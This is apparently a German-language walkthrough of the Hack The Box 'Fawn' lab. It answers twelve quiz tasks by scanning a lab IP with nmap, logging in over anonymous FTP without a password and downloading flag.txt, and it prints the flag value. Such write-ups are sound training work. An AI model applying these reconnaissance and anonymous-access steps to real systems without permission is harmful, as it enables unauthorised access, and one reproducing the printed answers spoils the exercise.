https://app.hackthebox.com/starting-point
Fawn
Task 1:
What does the 3-letter acronym FTP stand for?
Antwort 1:
File Transfer Protocol
Task 2:
Which port does the FTP service listen on usually?
Antwort 2:
21
Task 3:
What acronym is used for the secure version of FTP?
Antwort 3:
sFTP
Task 4:
What is the command we can use to send an ICMP echo request to test our connection to the target?
Antwort 4:
ping
Task 5:
From your scans, what version is FTP running on the target?
Wir versuchen uns mit dem Anonymous Account und ohne Passwort via FTP mit der Machine zu verbinden:
└─$ ftp anonymous@10.129.170.200 21
Connected to 10.129.170.200.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> Antwort 5:
vsFTPd 3.0.3
Task 6:
From your scans, what OS type is running on the target?
Wir scannen die Machine mit nmap:
└─$ nmap 10.129.170.200 -sV
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-01 15:47 CET
Nmap scan report for 10.129.170.200
Host is up (0.038s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.64 secondsAntwort 6:
Unix
Task 7:
What is the command we need to run in order to display the ‚ftp‘ client help menu?
Für viele Programme ist die Hilfeseite mit dem Programmnamen und -h aubrufbar.
Antwort 7:
ftp -h
Task 8:
What is username that is used over FTP when you want to log in without having an account?
Das haben wir bereits in Task 5 verwendet. Man kann immer den Anonymous Login versuchen, dieser benötigt auch kein Passwort.
Antwort 8:
Anonymous
Task 9:
What is the response code we get for the FTP message ‚Login successful‘?
Das sehen wir, wenn wir uns via FTP verbinden. Hier der Vorgang aus Task 5:
└─$ ftp anonymous@10.129.170.200 21
Connected to 10.129.170.200.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> Antwort 9:
230
Task 10:
There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.
Antwort 10:
ls
Task 11:
What is the command used to download the file we found on the FTP server?
Antwort 11:
get
Task 12:
Submit root flag
Gucken wir uns also auf dem FTP Server um und laden die flag herunter:
ftp> ls
229 Entering Extended Passive Mode (|||8389|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||33055|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |********************************************************************************************************************| 32 29.25 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.79 KiB/s)
ftp> Antwort 12:
035db21c881520061c53e0536e44f815